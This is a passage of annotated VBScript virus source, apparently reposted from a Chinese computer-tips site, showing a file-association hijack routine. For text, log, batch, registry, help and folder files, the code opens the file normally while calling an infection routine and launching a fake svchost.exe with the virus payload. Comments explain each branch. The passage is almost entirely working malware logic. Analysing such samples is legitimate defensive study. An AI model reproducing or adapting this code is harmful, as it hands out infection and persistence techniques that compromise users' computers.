
Param=Param&" "&Args(ArgNum)
ArgNum=ArgNum + 1
Loop
SubParam=LCase(Right(Param,3)) ' Take the rightmost 3 characters of Param, lowercased, into SubParam
Select Case SubParam ' Branch on the tail of the argument, which is effectively the file extension
Case "run" ' This case does not seem to occur normally, but it does run the first time
RunPath=Left(WScript.ScriptFullName,2) ' RunPath gets the drive that holds 72161642.vbs, e.g. D:
Call Run(RunPath) ' Run("F:") serves no real purpose
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "txt", "log","ini" ,"inf" ' These extensions mean the user opened a text file
RunPath="%SystemRoot%\system32\NOTEPAD.EXE "&Param
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "bat", "cmd" ' For batch files, display "you jump, i jump!" instead
RunPath="CMD /c echo you jump i jump!&pause"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "reg"
RunPath="regedit.exe"&""""&Trim(Param)&"""" ' Trim strips leading and trailing spaces from the path
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "chm"
RunPath="hh.exe "&""""&Trim(Param)&""""
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "hlp"
RunPath="winhlp32.exe "&""""&Trim(Param)&""""
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "dir"
RunPath=""""&Left(Trim(Param),Len(Trim(Param))-3)&"""" ' Strip the three letters "dir"
Call Run(RunPath) ' Open the folder
This article is from 电脑杂谈; when reposting, please cite this article's URL:
http://www.pc-fly.com/a/jisuanjixue/article-25802-1.html